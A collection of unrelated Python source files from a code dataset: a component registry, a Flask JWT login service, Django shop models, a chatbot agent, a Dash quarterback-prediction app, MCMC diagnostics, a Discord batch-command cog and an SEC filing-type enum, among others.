:copyright: Conceptual Vision Consulting LLC 2018-2019, see AUTHORS for more details.
:license: MIT, see LICENSE for more details.
"""
import threading
from typing import List, Any, Sequence
from .IReferences import IReferences
from .Reference import Reference
from .ReferenceException import ReferenceException
class References(IReferences):
"""
The most basic implementation of :class:`IReferences <pip_services3_commons.refer.IReferences.IReferences>` to store and locate component references.
Example:
.. code-block:: python
class MyController(IReferenceable):
_persistence = None
def set_references(self, references):
self._persistence = references.getOneRequired(Descriptor("mygroup", "persistence", "*", "*", "1.0"))
persistence = MyMongoDbPersistence()
references = References.from_tuples(
Descriptor("mygroup", "persistence", "mongodb", "default", "1.0"), persistence,
Descriptor("mygroup", "controller", "default", "default", "1.0"), controller)
controller.set_references(references)
"""
__lock = None
def __init__(self, tuples: Sequence[Any] = None):
"""
Creates a new instance of references and initializes it with references.
:param tuples: (optional) a list of values where odd elements are locators
and the following even elements are component references
"""
self._references: List[Reference] = []
self.__lock = threading.Lock()
if not (tuples is None):
index = 0
while index < len(tuples):
if index + 1 >= len(tuples):
break
self.put(tuples[index], tuples[index + 1])
index = index + 2
def put(self, locator: Any = None, component: Any = None):
"""
Puts a new reference into this reference map.
:param locator: a component reference to be added.
:param component: a locator to find the reference by.
"""
if component is None:
raise Exception("Component cannot be null")
self.__lock.acquire()
try:
self._references.append(Reference(locator, component))
finally:
self.__lock.release()
def remove(self, locator: Any) -> Any:
"""
Removes a previously added reference that matches specified locator.
If many references match the locator, it removes only the first one.
When all references shall be removed, use :func:`remove_all` method instead.
:param locator: a locator to remove reference
:return: the removed component reference.
"""
if locator is None:
return None
self.__lock.acquire()
try:
for reference in reversed(self._references):
if reference.match(locator):
self._references.remove(reference)
return reference.get_component()
finally:
self.__lock.release()
return None
def remove_all(self, locator: Any) -> List[Any]:
"""
Removes all component references that match the specified locator.
:param locator: a locator to remove reference by.
:return: a list, containing all removed references.
"""
components = []
if locator is None:
return components
self.__lock.acquire()
try:
for reference in reversed(self._references):
if reference.match(locator):
self._references.remove(reference)
components.append(reference.get_component())
finally:
self.__lock.release()
return components
def get_all_locators(self) -> List[Any]:
"""
Gets locators for all registered component references in this reference map.
:return: a list with component locators.
"""
locators = []
self.__lock.acquire()
try:
for reference in self._references:
locators.append(reference.get_locator())
finally:
self.__lock.release()
return locators
def get_all(self) -> List[Any]:
"""
Gets all component references registered in this reference map.
:return: a list with component references.
"""
components = []
self.__lock.acquire()
try:
for reference in self._references:
components.append(reference.get_component())
finally:
self.__lock.release()
return components
def get_optional(self, locator: Any) -> List[Any]:
"""
Gets all component references that match specified locator.
:param locator: the locator to find references by.
:return: a list with matching component references or empty list if nothing was found.
"""
try:
return self.find(locator, False)
except Exception as ex:
return []
def get_required(self, locator: Any) -> List[Any]:
"""
Gets all component references that match specified locator.
At least one component reference must be present. If it doesn't the method throws an error.
:param locator: the locator to find references by.
:return: a list with matching component references.
:raises: a :class:`ReferenceException <pip_services3_commons.refer.ReferenceException.ReferenceException>` when no references found.
"""
return self.find(locator, True)
def get_one_optional(self, locator: Any) -> Any:
"""
Gets an optional component reference that matches specified locator.
:param locator: the locator to find references by.
:return: a matching component reference or null if nothing was found.
"""
try:
components = self.find(locator, False)
return components[0] if len(components) > 0 else None
except Exception as ex:
return None
def get_one_required(self, locator: Any) -> Any:
"""
Gets a __required component reference that matches specified locator.
:param locator: the locator to find a reference by.
:return: a matching component reference.
:raises: a :class:`ReferenceException <pip_services3_commons.refer.ReferenceException.ReferenceException>` when no references found.
"""
components = self.find(locator, True)
return components[0] if len(components) > 0 else None
def find(self, locator: Any, required: bool) -> List[Any]:
"""
Gets all component references that match specified locator.
:param locator: the locator to find a reference by.
:param required: forces to raise an error if no reference is found.
:return: a list with matching component references.
:raises: a :class:`ReferenceException <pip_services3_commons.refer.ReferenceException.ReferenceException>` when __required is set to true but no references found.
"""
if locator is None:
raise Exception("Locator cannot be null")
components = []
self.__lock.acquire()
try:
index = len(self._references) - 1
while index >= 0:
reference = self._references[index]
if reference.match(locator):
component = reference.get_component()
components.append(component)
index = index - 1
if len(components) == 0 and required:
raise ReferenceException(None, locator)
finally:
self.__lock.release()
return components
@staticmethod
def from_tuples(*tuples: Any) -> 'References':
"""
Creates a new References from a list of key-args pairs called tuples.
:param tuples: a list of values where odd elements are locators
and the following even elements are component references
:return: a newly created References.
"""
return References(tuples)
|
StarcoderdataPython
|
8158851
|
<reponame>Martin-Jia/words-app<filename>app.py
from flask import Flask, request
import logging
from flask_httpauth import HTTPBasicAuth, HTTPTokenAuth
from threading import Timer
import random
import string
import datetime
from Utils.constants import Constants, ErrorCode, ErrorMessage
import jwt
from Utils.db_helper import DatabaseConnector
logger = logging.getLogger("restfulapi")
app = Flask(__name__)
auth = HTTPTokenAuth(scheme='Bearer')
cur_salt = {} # {sault: sault, expire_time: utc timestamp(second)}
db_connector = DatabaseConnector()
def gen_salt(salt_len):
return ''.join(random.sample(string.ascii_letters + string.digits, salt_len))
def set_salt():
cur_salt['salt'] = gen_salt(Constants.SALT_LEN)
cur_salt['expire'] = datetime.datetime.utcnow().timestamp() + Constants.SALT_EXPIRE_TIME
set_salt()
Timer(Constants.SALT_EXPIRE_TIME, set_salt).start()
def pack(error_code, error_msg, data):
return {
'error_code': error_code,
'error_msg': error_msg,
'data': data
}
@app.route('/get_salt')
def get_salt():
return pack('', '', cur_salt)
@auth.verify_token
def verify_token(token):
try:
body = jwt.decode(token, Constants.CONST_SALT, algorithms=["HS256"])
username = body['username']
token = body['token']
err, token_col = db_connector.query_user_token(username)
cur_time = datetime.datetime.utcnow().timestamp()
if err or not token_col:
logger.warn('wrong token')
return None
if token == token_col.get('token') and \
cur_time >= token_col.get('expire_time', float('inf')):
db_connector.update_user_token(username, token, cur_time + Constants.TOKEN_EXPIRE_TIME)
return username
return None
except jwt.exceptions.InvalidTokenError:
return None
except KeyError:
return None
@app.route('/login', methods=["POST"])
def login():
data = request.get_data()
salt = cur_salt.get('salt', '')
if salt == '':
logger.error('salt empty')
return pack(ErrorCode.INTERNEL_ERROR, ErrorMessage.INTERNEL_ERROR, '')
try:
json_body = jwt.decode(data, salt, algorithms=["HS256"])
username = json_body['username']
password = json_body['password']
except jwt.exceptions.InvalidTokenError:
return pack(ErrorCode.INVALID_SALT, ErrorMessage.INVALID_SALT, '')
except KeyError:
return pack(ErrorCode.INVALID_BODY, ErrorMessage.INVALID_BODY, '')
err, user = db_connector.query_user_with_username(username)
if err or not user:
return pack(ErrorCode.INVALID_USERNAME, ErrorMessage.INVALID_USERNAME)
if password == user.get('password'):
token = gen_salt(Constants.SALT_LEN)
expire_time = datetime.datetime.utcnow().timestamp() + Constants.TOKEN_EXPIRE_TIME
db_connector.update_user_token(username, token, expire_time)
ret = {
'data': {
'username': username,
'token': token
}
}
return pack('', '', jwt.encode(ret, Constants.CONST_SALT, algorithm="HS256"))
return pack(ErrorCode.WRONG_PASSWORD, ErrorMessage.WRONG_PASSWORD)
@app.route('/logout')
@auth.login_required
def logout():
username = auth.current_user()
if not username:
return pack(ErrorCode.LOGIN_NEEDED, ErrorMessage.LOGIN_NEEDED, None)
db_connector.clear_user_token(username)
return pack(None, None, 'logged out')
@app.route('/')
def test():
return 'hello world'
|
StarcoderdataPython
|
9707897
|
from django.db import models
from ckeditor_uploader.fields import RichTextUploadingField
# Create your models here.
class Product(models.Model):
category = models.ManyToManyField('products.ProductCategory', related_name='product_category')
tag = models.ManyToManyField('products.Tag', related_name='product_tags')
title = models.CharField(max_length=50)
description = RichTextUploadingField()
cover_image = models.ImageField(upload_to="product_cover_images", null=True, blank=True)
old_price = models.DecimalField(max_digits=7, decimal_places=2, null=True, blank=True)
price = models.DecimalField(max_digits=7, decimal_places=2, null=True, blank=True)
is_published = models.BooleanField(default=False)
view_count = models.IntegerField(default=0)
def get_quantity(self, obj):
p_versions = obj.product_version.all()
q = 0
for e in p_versions:
q += e.quantity
return q
def get_stock(self, obj):
stock = 'Not available'
count = 0
for elem in obj.product_version.all():
if elem.quantity != 0:
count += 1
if count > 0:
stock = 'True'
return stock
def __str__(self) -> str:
return self.title
class ProductVersion(models.Model):
product = models.ForeignKey('products.Product', related_name='product_version', on_delete=models.CASCADE)
size = models.ManyToManyField('products.Size', related_name='product_size', blank=True)
color = models.ManyToManyField('products.Color', related_name='product_color', blank=True)
quantity = models.IntegerField()
def get_stock(self, obj):
stock = 'True'
if obj.quantity == 0:
stock = "Not available"
return stock
def __str__(self) -> str:
return f'{self.product}, Size: {self.size.all()[0]}, Color: {self.color.all()[0]}'
class ProductCategory(models.Model):
"""
This model contains all products' categories and subcategories.
"""
parent = models.ForeignKey('self', on_delete=models.CASCADE, null=True, blank=True, related_name='categories')
title = models.CharField(max_length=50)
def __str__(self) -> str:
if self.parent:
return f'{self.parent} > {self.title}'
return self.title
class Meta:
verbose_name = "Product Category"
verbose_name_plural = 'Product Categories'
class Size(models.Model):
"""
This models contains all products' sizes.
"""
size = models.CharField(max_length=10)
def __str__(self) -> str:
return self.size
class Color(models.Model):
"""
This model contains all products' colors
"""
color = models.CharField(max_length=50)
def __str__(self) -> str:
return self.color
class Tag(models.Model):
"""
This model contains all products' tags.
"""
tag = models.CharField(max_length=50)
def __str__(self) -> str:
return self.tag
class Image(models.Model):
"""
This model contains photos which related with the products
"""
product = models.ForeignKey("Product", on_delete=models.CASCADE, null=True, blank=True, related_name="product_image")
image = models.ImageField(upload_to="product_images", null=True, blank=True)
def __str__(self) -> str:
return f'{self.product}'
class Review(models.Model):
"""
This model contains reviews for each products
"""
product = models.ForeignKey("Product", on_delete=models.CASCADE, null=True, blank=True, related_name="product_reviews")
RATES =[
(1, "20"),
(2, "40"),
(3, "60"),
(4, "80"),
(5, "100"),
]
value_rate = models.IntegerField(choices=RATES)
quality_rate = models.IntegerField(choices=RATES)
price_rate = models.IntegerField(choices=RATES)
nickname = models.CharField(max_length=50)
summary = models.CharField(max_length=100)
review = models.CharField(max_length=500)
def __str__(self) -> str:
return self.summary
|
StarcoderdataPython
|
3428170
|
<gh_stars>1-10
helpstring = "voiceme"
arguments = ["self", "info", "args"]
minlevel = 3
def main(connection, info, args) :
"""Voices the sender"""
connection.rawsend("MODE %s +v %s\n" % (info["channel"], info["sender"]))
|
StarcoderdataPython
|
4819184
|
<reponame>jerroydmoore/YARB
'''
Agent
Created on Jan 28, 2011
@author: yangwookkang
'''
import time
import utils
import sys
from nlu.NLparser import NLparser
from nlg.NLgenerator import NLgenerator
from dm.dialogmanager import DialogManager
from datetime import date
from dm.imdb_wrapper import IMDBWrapper
from dm.localdb_wrapper import LocalDBWrapper
from nlu.entity import EntitySet
class Agent:
def __init__(self, verbose = False):
# load modules
# NLU, DB connection test
self.nlu = NLparser(verbose)
# verbose true for DM and NLG
verbose = True
self.dm = DialogManager(verbose)
self.nlg = NLgenerator(verbose)
self.sessionid = date.strftime(date.today(),"%y%m%d") + "_" + time.strftime("%H%M%S")
self.logger = utils.ConsoleAndFileLogger(self.sessionid)
def run(self):
self.logger.log("Hello. I am YARB (Yet Another Recommendation Bot).")
self.logger.log("Please tell me your name.")
usermsg = raw_input("> ")
self.logger.logtofile("> " + usermsg)
if (self.dm.processUserName(usermsg) == 1):
self.logger.log("Welcome back, " + usermsg + ".")
else:
self.logger.log("Nice to meet you, " + usermsg + ".")
self.logger.log("If you'd like a recommendation, please tell\nme about what you like or dislike.")
self.dm.loadOptions()
while not self.dm.sessionclosed():
usermsg = raw_input("> ")
self.logger.logtofile("> " + usermsg)
if usermsg == "":
continue
nluoutput = self.nlu.process(usermsg) # NLU
for output in nluoutput:
dmoutput = self.dm.process(output) # DM
#dmoutput = self.dm.process(nluoutput)
response = self.nlg.process(dmoutput) # NLG
self.logger.log(response)
self.dm.saveUserPreferences()
self.logger.log("Session closed [id = {0:s}].".format(self.sessionid))
def test(self, inputfilename):
print 'reading: ' + inputfilename
infile = open(inputfilename, 'r')
num = 1
breakpoint = 29
print 'processing... classifier: trivia'
for line in infile:
# NLU process
input = line.strip()
#print input
nluoutput = self.nlu.process(input) # NLU
#if num != breakpoint and nluoutput.get_classifier() != "userPreference":
# num = num + 1
# continue
#if breakpoint == num:
#print str(num) + ". " + line.replace('\\','') + " --> " + nluoutput.get_classifier() + " , [", nluoutput.tostr_entities(), "]"
#if nluoutput.get_classifier() == "trivia":
print str(num) + ". " + input
dmoutput = self.dm.process(nluoutput)
msg = self.nlg.process(dmoutput)
print "> " + msg
print
num = num + 1
def test_db():
IMDBWrapper()
pass
# main function
if __name__ == '__main__':
#test_db()
#Agent().test("./corpus1.txt")
Agent().run()
"""
# imdb test
localdb = LocalDBWrapper()
localdb.load_preference("ywkang")
#localdb.add_preference("genre", "Comedy", 4)
print localdb.get_preference()
db = IMDBWrapper()
entities = EntitySet("dummy")
db.get_recommendation(entities, localdb.get_preference())
"""
|
StarcoderdataPython
|
6700794
|
'''
Created on Jan 10, 2012
@author: tjhunter
All the data structures as used in the python files.
'''
class Coordinate(object):
""" A geolocation representation.
"""
def __init__(self, lat, lng):
self.lat = lat
self.lon = lng
def __eq__(self, other):
return self.lat == other.lat and self.lon == other.lon
def __ne__(self, other):
return not self.__eq__(other)
class Spot(object):
""" Spot representation.
"""
def __init__(self, link_id, offset, coordinate=None):
self.linkId = link_id
self.offset = offset
self.coordinate = coordinate
def __eq__(self, other):
return self.linkId == other.linkId and int(10 * self.offset) == int(10 * other.offset)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "Spot[%s, %.1f]" % (str(self.linkId), self.offset)
class Route(object):
""" Representation of a netconfig.Route
"""
def __init__(self, links, spots, geometry=None):
self.link_ids = links
self.spots = spots
self.geometry = geometry
#self.length = sum([link.length for link in self.link_ids[:-1]]) - self.firstSpot.offset + self.lastSpot.offset
@property
def firstSpot(self):
return self.spots[0]
@property
def lastSpot(self):
return self.spots[-1]
@staticmethod
def fromPair(links, start_spot, end_spot):
return Spot(links, [start_spot, end_spot])
def __repr__(self):
return "Route[%s,link_ids=%s,%s]" % (str(self.firstSpot), str(self.link_ids), str(self.lastSpot))
class TSpot(object):
""" A timed spot.
"""
def __init__(self, spot, vehicle_id, time,
hired=None, speed=None, obsCoordinate=None):
self.spot = spot
self.id = vehicle_id
self.time = time
self.hired = hired
self.speed = speed
self.obsCoordinate = obsCoordinate
def __repr__(self):
return "TSpot[%s,%s, %s]" % (str(self.spot), str(self.time), str(self.id))
class RouteTT(object):
""" Python representation of the RouteTT object
"""
def __init__(self, route, start_time, end_time, vehicle_id=None):
self.route = route
self.startTime = start_time
self.endTime = end_time
self.id = vehicle_id
self.tt = (self.endTime - self.startTime).total_seconds()
#self.vel = self.route.length / self.tt
def __repr__(self):
return "RouteTT[%s, %s, %s, %s]" % (str(self.id), str(self.startTime), str(self.endTime), str(self.route))
# TODO(?) rename to something else
class Point_pts(object):
""" A point in the time-space diagram associated with time, space and speed
"""
def __init__(self, space, time, speed):
self.space = space
self.time = time
self.speed = speed
class CutTrajectory(object):
""" A simplified trajectory for the stop/go model.
"""
def __init__(self, rtts):
"""
Arguments:
- rtts: list of RouteTT objects
"""
self.pieces = rtts
self.numPieces = len(self.pieces)
|
StarcoderdataPython
|
6457591
|
<reponame>fei-protocol/checkthechain
from .crud import *
|
StarcoderdataPython
|
6551233
|
<gh_stars>1-10
from random import *
from math import *
def rumus (x1, x2) :
return ((2 * (pow(x1,2)) + pow(x2,4)/3) * (pow(x1,2)))-(x1 * x2) + (4 * (pow(x2,2)) * (pow(x2,2)))
def rand () :
return uniform(-1,1)
def key (dE, T) :
return exp(-dE/T)
x1 = rand()
x2 = rand()
CurrentState = rumus(x1,x2)
BSF = CurrentState
Tawal = 2000000000000
Takhir = 0.000001
CoolingRate = 0.9999
while Tawal > Takhir :
x1 = rand()
x2 = rand()
NewState = rumus(x1, x2)
dE = NewState - CurrentState
if dE < 0 :
Bx1 = x1
Bx2 = x2
CurrentState = NewState
BSF = NewState
else:
R = random()
if key(dE, Tawal) > R :
Bx1 = x1
Bx2 = x2
CurrentState = NewState
BSF = NewState
Tawal = Tawal * CoolingRate
print ("x1 = ", Bx1, "x2 = ", Bx2)
print ("BSF = ", BSF)
|
StarcoderdataPython
|
3207711
|
# Imports from 3rd party libraries
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
# Imports from this application
from app import app
from joblib import load
pipeline = load('assets/pipeline.joblib')
import pandas as pd
@app.callback(
Output('prediction-content', 'children'),
[#Input('completions_per_year', 'value'), Input('wins_per_year', 'value'), Input('height', 'value'),
#Input('forty_yard_dash', 'value')],
Input('games_played', 'value'), Input('passing_completions', 'value'), Input('passing_attempts', 'value'),
Input('passing_percentage', 'value'), Input('passing_yards', 'value'), Input('passing_tds', 'value'),
Input('passing_ints', 'value'), Input('passer_rating', 'value'), Input('passes_per_year', 'value'),
Input('completions_per_year', 'value'), Input('yards_per_year', 'value'), Input('tds_per_year', 'value'),
Input('ints_per_year', 'value'), Input('height', 'value'), Input('weight', 'value'),
Input('forty_yard_dash', 'value'), Input('vert_leap', 'value'), Input('broad_jump', 'value'),
Input('shuttle_run', 'value'), Input('three_cone', 'value'), Input('no_combine_attendance', 'value'),
Input('power_five_conf', 'value'), Input('conference_championships', 'value'), Input('wins_per_year', 'value')],
)
def predict(#completions_per_year, wins_per_year, height, forty_yard_dash):
games_played, passing_completions, passing_attempts,
passing_percentage, passing_yards, passing_tds, passing_ints,
passer_rating, passes_per_year, completions_per_year, yards_per_year,
tds_per_year, ints_per_year, height, weight, forty_yard_dash,
vert_leap, broad_jump, shuttle_run, three_cone, no_combine_attendance,
power_five_conf, conference_championships, wins_per_year):
df = pd.DataFrame(
columns=[#'completions_per_year','wins_per_year','height','forty_yard_dash'],
'games_played','passing_completions','passing_attempts',
'passing_percentage','passing_yards','passing_tds','passing_ints',
'passer_rating','passes_per_year','completions_per_year','yards_per_year',
'tds_per_year','ints_per_year','height','weight','forty_yard_dash',
'vert_leap','broad_jump','shuttle_run','three_cone','no_combine_attendance',
'power_five_conf','conference_championships','wins_per_year'],
data=[[#completions_per_year, wins_per_year, height, forty_yard_dash]]
games_played, passing_completions, passing_attempts,
passing_percentage, passing_yards, passing_tds, passing_ints,
passer_rating, passes_per_year, completions_per_year, yards_per_year,
tds_per_year, ints_per_year, height, weight, forty_yard_dash,
vert_leap, broad_jump, shuttle_run, three_cone, no_combine_attendance,
power_five_conf, conference_championships, wins_per_year]]
)
y_pred = pipeline.predict(df)[0]
return html.H1(f'{y_pred:.0f} Starts')
# 2 column layout. 1st column width = 4/12
# https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout
column1 = dbc.Col(
[
dcc.Markdown(
"""
## Predictions
Input the college stats of the quarterback that you would like to predict.
"""
),
dcc.Markdown('#### Completions per Year'),
dcc.Input(
id='completions_per_year',
placeholder='AVG: 178',
type='number',
value=178
),
dcc.Markdown('#### Passing Yards per Season'),
dcc.Input(
id='yards_per_year',
placeholder='AVG: 2194',
type='number',
value=2194
),
dcc.Markdown('#### Passes per Year'),
dcc.Input(
id='passes_per_year',
placeholder='AVG: 211',
type='number',
value=211
),
dcc.Markdown('#### Passing TDs per Season'),
dcc.Input(
id='tds_per_year',
placeholder='AVG: 15',
type='number',
value=15
),
dcc.Markdown('#### Interceptions per Season'),
dcc.Input(
id='ints_per_year',
placeholder='AVG: 8',
type='number',
value=8
),
dcc.Markdown('#### Height (in)'),
dcc.Input(
id='height',
placeholder='AVG: 74',
type='number',
value=74
),
dcc.Markdown('#### Weight (lb)'),
dcc.Input(
id='weight',
placeholder='AVG: 222 lbs',
type='number',
value=222
),
dcc.Markdown('#### 40 Time'),
dcc.Input(
id='forty_yard_dash',
placeholder='AVG: 4.87 Seconds',
type='number',
value=4.87
),
dcc.Markdown('#### Vertical Leap (in)'),
dcc.Input(
id='vert_leap',
placeholder='AVG: 24 inches',
type='number',
value=24
),
dcc.Markdown('#### 3-Cone Drill'),
dcc.Input(
id='three_cone',
placeholder='AVG: 7.34 Seconds',
type='number',
value=7.34
),
dcc.Markdown('#### Broad Jump'),
dcc.Input(
id='broad_jump',
placeholder='AVG: 106 inches',
type='number',
value=106
),
dcc.Markdown('#### Shuttle Run'),
dcc.Input(
id='shuttle_run',
placeholder='AVG: 4.46 Seconds',
type='number',
value=4.46
),
],
md=4,
)
column2 = dbc.Col(
[
dcc.Markdown('#### Games Played'),
dcc.Input(
id='games_played',
placeholder='AVG: 32 Games',
type='number',
value=32
),
dcc.Markdown('#### Total Passing Completions'),
dcc.Input(
id='passing_completions',
placeholder='AVG: 563',
type='number',
value=563
),
dcc.Markdown('#### Total Passing Attempts'),
dcc.Input(
id='passing_attempts',
placeholder='AVG: 939',
type='number',
value=939
),
dcc.Markdown('#### Career Passing Percentage'),
dcc.Input(
id='passing_percentage',
placeholder='AVG: 59.2',
type='number',
value=59.2
),
dcc.Markdown('#### Total Passing Yards'),
dcc.Input(
id='passing_yards',
placeholder='AVG: 6900',
type='number',
value=6900
),
dcc.Markdown('#### Total Passing TDs'),
dcc.Input(
id='passing_tds',
placeholder='AVG: 49',
type='number',
value=49
),
dcc.Markdown('#### Total Interceptions'),
dcc.Input(
id='passing_ints',
placeholder='AVG: 26',
type='number',
value=26
),
dcc.Markdown('#### Career Passer Rating'),
dcc.Input(
id='passer_rating',
placeholder='AVG: 131',
type='number',
value=131
),
dcc.Markdown('#### Wins per Year'),
dcc.Slider(
id='wins_per_year',
min=0,
max=12,
step=13,
value=5,
marks={n: str(n) for n in range(0,13,1)},
className='mb-5',
),
dcc.Markdown('#### Conference Championships Won'),
dcc.Slider(
id='conference_championships',
min=0,
max=4,
step=4,
value=0,
marks={n: str(n) for n in range(0,5,1)},
className='mb-5',
),
dcc.Markdown('#### Attended Combine'),
dcc.Dropdown(
id='no_combine_attendance',
options = [
{'label': 'Yes', 'value': 0},
{'label': 'No', 'value': 1},
],
value = 0,
className='mb-5',
),
dcc.Markdown('#### Power 5 Conference'),
dcc.Dropdown(
id='power_five_conf',
options = [
{'label': 'Yes', 'value': 1},
{'label': 'No', 'value': 0},
],
value = 1,
className='mb-5',
),
],
md=4,
)
column3 = dbc.Col(
[
html.H2('Expected NFL Starts per Season', className='mb-5'),
html.Div(id='prediction-content', className='lead')
]
)
layout = dbc.Row([column1, column2, column3])
|
StarcoderdataPython
|
1855652
|
<reponame>bmorris3/mosfire_wasp6
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 31 08:56:57 2015
@author: bmmorris
"""
import numpy as np
from matplotlib import pyplot as plt
def gelmanrubin(samples, **kwargs):
'''
The Gelman-Rubin (1992) statistic R-hat.
Parameters
----------
samples : array-like
Array of MCMC links for each parameter
plot : bool
If `plot`=True, draw a bar plot of the R-hats
labels : list of strings
If `plot`=True, label each bar on the bar plot
with the names in the list `labels`. Otherwise,
use indices as labels.
Returns
-------
Rhat : float
The Gelman-Rubin R-hat statistic, approaches unity after infinite
steps of a well-mixed chain.
'''
n, m = np.shape(samples)
Rhats = np.zeros(m)
for j in range(m):
individualchains = [samples[i:, j][::2*m] for i in range(2*m)]
# W = mean of within-chain variance
W = np.mean([np.var(chain, ddof=1) for chain in individualchains])
# B = between chain variance
B = n*np.var([np.mean(chain) for chain in individualchains], ddof=1)
Vhat = W*(n-1)/n + B/n
Rhats[j] = np.sqrt(Vhat/W)
if kwargs.get('plot', False):
if kwargs.get('labels', False):
labels = kwargs.get('labels')
else:
labels = range(m)
fig, ax = plt.subplots(1, figsize=(16,5))
ax.bar(np.arange(len(labels))-0.5, Rhats, color='k')
ax.set_xticks(range(len(labels)))
ax.set_xticklabels(labels, ha='right')
[l.set_rotation(45) for l in ax.get_xticklabels()]
ax.set_ylim([0.9, np.max(Rhats)])
ax.set_xlim([-1, len(labels)+1])
ax.set_ylabel('$\hat{R}$')
ax.set_title('Gelman-Rubin Statistic')
plt.show()
return Rhats
def chi2(v1, v2, err, Nfreeparams):
return np.sum( ((v1-v2)/err)**2 )/(len(v1) - Nfreeparams)
def medplusminus(vector):
'''
Returns the 50%ile, the difference between the 84%ile and 50%ile, and
the difference between the 50%ile and the 16%ile, representing
the median and the +/-1 sigma samples.
Parameters
----------
vector : array-like
Vector of MCMC samples for one fitting parameter
'''
v = np.percentile(vector, [16, 50, 84])
return v[1], v[2]-v[1], v[1]-v[0]
|
StarcoderdataPython
|
3286631
|
<gh_stars>1-10
def sum_finding_dfs(nums, target):
frontier = [(0, [])]
while frontier:
partial_sum, nums_so_far = frontier.pop()
if partial_sum == target:
yield nums_so_far
continue
if partial_sum > target:
continue
for num in nums:
if not nums_so_far or num >= nums_so_far[-1]:
frontier.append((partial_sum + num, nums_so_far + [num]))
class Solution():
# @param A : list of integers
# @param B : integer
# @return a list of list of integers
def combinationSum(self, A, B):
unique_nums = list(set(A))
unique_nums.sort(reverse=True)
return list(sum_finding_dfs(unique_nums, B))
a = Solution()
print(a.combinationSum([2,3,6,7], 7))
|
StarcoderdataPython
|
4877403
|
# The MetaCommand Cog, which handles all batch commands.
import os
import discord as dc
from discord.ext import commands
from cogs_textbanks import url_bank, query_bank, response_bank
from bot_common import bot, CONST_AUTHOR, user_or_perms
_cmd_dir = 'cmd'
class BatchCommands(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
if bot.get_cog('ReactRoleTagger'):
pass
print(response_bank.batch_cog_ready)
@commands.group(name='batch')
@commands.bot_has_permissions(send_messages=True)
@user_or_perms(CONST_AUTHOR, administrator=True)
async def batch(self, ctx):
if ctx.invoked_subcommand is None:
await ctx.send(response_bank.batch_usage_format)
@batch.error
async def batch_error(self, ctx, error):
if isinstance(error, commands.BotMissingPermissions):
return
raise error
@batch.command(name='save')
async def batch_save(self, ctx, name):
if not (name.isascii() and name.replace('_', '').isalnum()):
await ctx.send(response_bank.batch_save_name_error)
return
if not (atts := ctx.message.attachments):
await ctx.send(response_bank.batch_save_missing_file)
return
if len(atts) > 1:
await ctx.send(response_bank.batch_save_ambiguous_file)
return
await atts[0].save(os.path.join(_cmd_dir, f'{name}.txt'))
await ctx.send(response_bank.batch_save_confirm.format(name=name))
@batch_save.error
async def batch_save_error(self, ctx, error):
raise error
@batch.command(name='exec')
async def batch_exec(self, ctx, name):
if not os.path.exists(fp := os.path.join(_cmd_dir, f'{name}.txt')):
await ctx.send(response_bank.batch_exec_name_error.format(name=name))
return
await ctx.send(response_bank.batch_exec_start.format(name=name))
with open(fp, 'r') as cmdfile:
msg = ctx.message
for line in cmdfile:
msg.content = line.strip()
try:
await self.bot.process_commands(msg)
except Exception as exc:
await ctx.send(f'{type(exc).__name__}: {"".join(exc.args)}')
raise
@batch_exec.error
async def batch_exec_error(self, ctx, error):
raise error
bot.add_cog(BatchCommands(bot))
|
StarcoderdataPython
|
8007538
|
from enum import Enum
class FilingType(Enum):
"""Available filing types to be used when creating Filing object.
.. versionadded:: 0.1.5
"""
FILING_1 = '1'
FILING_1A = '1-a'
FILING_1E = '1-e'
FILING_1K = '1-k'
FILING_1N = '1-n'
FILING_1SA = '1-sa'
FILING_1U = '1-u'
FILING_1Z = '1-z'
FILING_10 = '10'
FILING_10D = '10-d'
FILING_10K = '10-k'
FILING_10M = '10-m'
FILING_10Q = '10-q'
FILING_11K = '11-k'
FILING_12B25 = '12b-25'
FILING_13F = '13f'
FILING_13H = '13h'
FILING_144 = '144'
FILING_15 = '15'
FILING_15F = '15f'
FILING_17H = '17-h'
FILING_18 = '18'
FILING_18K = '18-k'
FILING_19B4 = '19b-4'
FILING_19B4E = '19b-4(e)'
FILING_19B7 = '19b-7'
FILING_2E = '2-e'
FILING_20F = '20-f'
FILING_24F2 = '24f-2'
FILING_25 = '25'
FILING_3 = '3'
FILING_4 = '4'
FILING_40F = '40-f'
FILING_8K = '8-k'
FILING_ABS15G = 'abs-15g'
FILING_ABSEE = 'abs-ee'
FILING_ADV = 'adv'
FILING_ADVE = 'adv-e'
FILING_ADVH = 'adv-h'
FILING_ADVNR = 'adv-nr'
FILING_ADVW = 'adv-w'
FILING_ATS = 'ats'
FILING_ATSN = 'ats-n'
FILING_ATSR = 'ats-r'
FILING_BD = 'bd'
FILING_BDN = 'bd-n'
FILING_BDW = 'bdw'
FILING_C = 'c'
FILING_CA1 = 'ca-1'
FILING_CB = 'cb'
FILING_CFPORTAL = 'cfportal'
FILING_CUSTODY = 'custody'
FILING_D = 'd'
FILING_DEF_14A = 'def 14a'
FILING_F1 = 'f-1'
FILING_F10 = 'f-10'
FILING_F3 = 'f-3'
FILING_F4 = 'f-4'
FILING_F6 = 'f-6'
FILING_F7 = 'f-7'
FILING_F8 = 'f-8'
FILING_F80 = 'f-80'
FILING_FN = 'f-n'
FILING_FX = 'f-x'
FILING_ID = 'id'
FILING_MA = 'ma'
FILING_MAI = 'ma-i'
FILING_MANR = 'ma-nr'
FILING_MAW = 'ma-w'
FILING_MSD = 'msd'
FILING_MSDW = 'msdw'
FILING_N14 = 'n-14'
FILING_N17D1 = 'n-17d-1'
FILING_N17F1 = 'n-17f-1'
FILING_N17F2 = 'n-17f-2'
FILING_N18F1 = 'n-18f-1'
FILING_N1A = 'n-1a'
FILING_N2 = 'n-2'
FILING_N23C3 = 'n-23c-3'
FILING_N27D1 = 'n27d-1'
FILING_N3 = 'n-3'
FILING_N4 = 'n-4'
FILING_N5 = 'n-5'
FILING_N54A = 'n-54a'
FILING_N54C = 'n-54c'
FILING_N6 = 'n-6'
FILING_N6EI1 = 'n-6ei-1'
FILING_N6F = 'n-6f'
FILING_N8A = 'n-8a'
FILING_N8B2 = 'n-8b-2'
FILING_N8B4 = 'n-8b-4'
FILING_N8F = 'n-8f'
FILING_NCEN = 'n-cen'
FILING_NCR = 'n-cr'
FILING_NCSR = 'n-csr'
